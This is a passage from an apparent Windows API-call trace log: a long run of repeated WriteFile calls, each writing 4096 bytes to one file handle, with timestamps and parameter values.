lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.406] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.406] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.406] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.407] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.407] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.407] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.407] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.408] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.408] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.408] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.408] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.409] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.409] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.409] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.409] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.410] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.410] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.410] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.410] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.410] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.411] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.411] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.411] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.411] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.412] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.412] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.412] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.412] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.413] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.413] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.413] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.413] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.414] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.414] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.414] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.414] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.415] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.415] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.415] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.415] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.415] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.416] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.416] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.416] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.417] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.417] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.417] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.417] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.418] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.418] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.418] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.419] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.419] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.420] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.421] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.421] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.421] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.422] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.422] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.422] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.422] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.423] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.423] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.423] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.423] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.424] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.424] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.424] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.424] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.425] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.425] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.425] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.425] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.426] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.426] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.426] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.427] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.427] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.427] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.427] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.428] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.428] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.428] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.428] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.429] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.429] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.429] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.429] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.430] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.430] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.430] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.430] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.431] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.431] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.431] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.431] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.432] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, 